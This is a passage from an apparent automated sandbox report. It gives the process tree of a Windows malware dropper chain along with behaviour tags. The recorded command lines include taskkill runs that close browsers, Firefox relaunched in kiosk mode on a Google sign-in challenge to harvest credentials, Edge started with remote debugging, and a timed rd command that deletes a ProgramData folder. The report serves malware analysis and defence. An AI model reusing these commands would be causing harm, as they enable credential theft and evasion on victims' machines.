                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4964,i,17391268965578064136,4953445333590501740,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8
                              6⤵
                                PID:5452
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              5⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:6096
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff94d5d46f8,0x7ff94d5d4708,0x7ff94d5d4718
                                6⤵
                                • Checks processor information in registry
                                • Enumerates system info in registry
                                PID:6108
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                6⤵
                                  PID:5472
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
                                  6⤵
                                    PID:5456
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:8
                                    6⤵
                                      PID:5504
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5396
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:5264
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:744
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2112,3550573327250369991,15537486818071073066,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
                                      6⤵
                                      • Uses browser remote debugging
                                      PID:4888
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\w4eua" & exit
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5112
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 10
                                      6⤵
                                      • Delays execution with timeout.exe
                                      PID:2708
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 920 -s 956
                                  4⤵
                                  • Program crash
                                  PID:3084
                              • C:\Users\Admin\AppData\Local\Temp\1086811001\3omTNLZ.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086811001\3omTNLZ.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious behavior: EnumeratesProcesses
                                PID:900
                              • C:\Users\Admin\AppData\Local\Temp\1086812001\d2YQIJa.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086812001\d2YQIJa.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5240
                              • C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:5660
                                • C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1086813001\Ta3ZyUR.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:5704
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5660 -s 968
                                  4⤵
                                  • Program crash
                                  PID:5764
                              • C:\Users\Admin\AppData\Local\Temp\1086814001\67c3b98f4d.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086814001\67c3b98f4d.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:6080
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:6120
                              • C:\Users\Admin\AppData\Local\Temp\1086815001\c55a0e6e0b.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086815001\c55a0e6e0b.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of SetThreadContext
                                PID:2780
                                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • System Location Discovery: System Language Discovery
                                  PID:5308
                              • C:\Users\Admin\AppData\Local\Temp\1086816001\2a2c7885e3.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086816001\2a2c7885e3.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:4668
                              • C:\Users\Admin\AppData\Local\Temp\1086817001\207737d668.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086817001\207737d668.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4824
                              • C:\Users\Admin\AppData\Local\Temp\1086818001\c8ec90ad9b.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086818001\c8ec90ad9b.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Checks processor information in registry
                                PID:5320
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 1516
                                  4⤵
                                  • Program crash
                                  PID:5424
                              • C:\Users\Admin\AppData\Local\Temp\1086819001\amnew.exe
                                "C:\Users\Admin\AppData\Local\Temp\1086819001\amnew.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:1720
                                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                  4⤵
                                  • Downloads MZ/PE file
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Adds Run key to start application
                                  • System Location Discovery: System Language Discovery
                                  PID:5880
                                  • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3688
                                    • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:1204
                                  • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:1784
                                    • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:1760
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 828
                                      6⤵
                                      • Program crash
                                      PID:3788
                                  • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5476
                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5288
                                    • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      PID:5312
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 964
                                      6⤵
                                      • Program crash
                                      PID:5296
                                  • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:6808
                                  • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:5748
                                    • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:468
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 968
                                      6⤵
                                      • Program crash
                                      PID:392
                                  • C:\Users\Admin\AppData\Local\Temp\10008080101\9cf6487121.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10008080101\9cf6487121.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SendNotifyMessage
                                    PID:3840
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2052
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:432
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1008
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM opera.exe /T
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5528
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM brave.exe /T
                                      6⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5148
                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                      6⤵
                                        PID:1552
                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                          7⤵
                                          • Checks processor information in registry
                                          • Modifies registry class
                                          • Suspicious use of SendNotifyMessage
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4320
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1960 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 27181 -prefMapSize 244680 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1849b984-aa93-4fe9-a612-39e851679e1d} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" gpu
                                            8⤵
                                              PID:6660
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 28101 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0326449d-6d14-489d-bb2c-30fd95f95e5f} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" socket
                                              8⤵
                                                PID:6736
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2976 -childID 1 -isForBrowser -prefsHandle 2672 -prefMapHandle 2892 -prefsLen 22684 -prefMapSize 244680 -jsInitHandle 912 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e233bf8-11e3-4bba-be74-f269d8e87bea} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" tab
                                                8⤵
                                                  PID:7156
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4156 -childID 2 -isForBrowser -prefsHandle 2820 -prefMapHandle 4092 -prefsLen 32588 -prefMapSize 244680 -jsInitHandle 912 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e8e9b95-6c42-40e5-a78b-0b7c3bf2cfbc} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" tab
                                                  8⤵
                                                    PID:468
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4896 -prefMapHandle 4900 -prefsLen 32588 -prefMapSize 244680 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fe198c0-9b92-42a1-ab35-783dc26dd6bf} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" utility
                                                    8⤵
                                                      PID:1896
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5180 -childID 3 -isForBrowser -prefsHandle 5176 -prefMapHandle 5172 -prefsLen 27030 -prefMapSize 244680 -jsInitHandle 912 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed9891d8-2652-452d-83c8-d3eb1e67ee38} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" tab
                                                      8⤵
                                                        PID:4188
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5316 -childID 4 -isForBrowser -prefsHandle 5324 -prefMapHandle 5328 -prefsLen 27030 -prefMapSize 244680 -jsInitHandle 912 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {92e97c2a-73f6-4409-9ef5-e482c81b9d1c} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" tab
                                                        8⤵
                                                          PID:5064
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5524 -childID 5 -isForBrowser -prefsHandle 5600 -prefMapHandle 5596 -prefsLen 27030 -prefMapSize 244680 -jsInitHandle 912 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f40ead7f-da87-41d7-9289-63803bb20cfe} 4320 "\\.\pipe\gecko-crash-server-pipe.4320" tab
                                                          8⤵
                                                            PID:5160
                                                    • C:\Users\Admin\AppData\Local\Temp\10008090101\5f35f8572a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10008090101\5f35f8572a.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      PID:4528
                                                • C:\Users\Admin\AppData\Local\Temp\1086820001\b56e837fb4.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086820001\b56e837fb4.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:5824
                                                • C:\Users\Admin\AppData\Local\Temp\1086821001\075b5e47c5.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086821001\075b5e47c5.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4604
                                                • C:\Users\Admin\AppData\Local\Temp\1086822001\4fce678d37.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086822001\4fce678d37.exe"
                                                  3⤵
                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                  • Checks BIOS information in registry
                                                  • Executes dropped EXE
                                                  • Identifies Wine through registry keys
                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                  • System Location Discovery: System Language Discovery
                                                  PID:6032
                                                • C:\Users\Admin\AppData\Local\Temp\1086823001\2ab110fa1b.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\1086823001\2ab110fa1b.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:4604
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM firefox.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4516
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM chrome.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2860
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM msedge.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2320
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM opera.exe /T
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4852
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /F /IM brave.exe /T
                                                    4⤵
                                                    • Kills process with taskkill
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5596
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                    4⤵
                                                      PID:6036
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                        5⤵
                                                        • Checks processor information in registry
                                                        • Modifies registry class
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of SendNotifyMessage
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:2604
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1884 -prefsLen 27317 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {51e5a35d-a607-418c-95a8-80a0f84c68cf} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" gpu
                                                          6⤵
                                                            PID:5952
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2448 -prefsLen 28237 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f093145-9268-4144-855f-47cd55c2cabe} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" socket
                                                            6⤵
                                                              PID:932
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3288 -childID 1 -isForBrowser -prefsHandle 3300 -prefMapHandle 2940 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37e67ae2-0508-4762-8d14-26a20cd69b93} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" tab
                                                              6⤵
                                                                PID:2576
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 2 -isForBrowser -prefsHandle 2984 -prefMapHandle 3344 -prefsLen 32727 -prefMapSize 244628 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f12142f-8259-4b98-bff4-a6565bf26442} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" tab
                                                                6⤵
                                                                  PID:5980
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4916 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4908 -prefsLen 32606 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {41d31c61-df04-4936-9da7-d7d2da0d38b1} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" utility
                                                                  6⤵
                                                                  • Checks processor information in registry
                                                                  PID:6492
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5128 -childID 3 -isForBrowser -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7d00cf94-fec2-49b8-a921-0f3e0ef97cbe} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" tab
                                                                  6⤵
                                                                    PID:6700
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5268 -childID 4 -isForBrowser -prefsHandle 5276 -prefMapHandle 5280 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f3cb22d8-7f66-4b4b-9b25-847299d29110} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" tab
                                                                    6⤵
                                                                      PID:6712
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 5 -isForBrowser -prefsHandle 5460 -prefMapHandle 5464 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1244 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {60d2adb8-89ea-49af-84b0-d515281e41f2} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" tab
                                                                      6⤵
                                                                        PID:6724
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -parentBuildID 20240401114208 -prefsHandle 2016 -prefMapHandle 3160 -prefsLen 32641 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ac8b27c-68aa-418f-88c2-df65eb327389} 2604 "\\.\pipe\gecko-crash-server-pipe.2604" gpu
                                                                        6⤵
                                                                          PID:5276
                                                                  • C:\Users\Admin\AppData\Local\Temp\1086824001\95e1feba6d.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\1086824001\95e1feba6d.exe"
                                                                    3⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:1580
                                                                    • C:\Windows\SysWOW64\cmd.exe
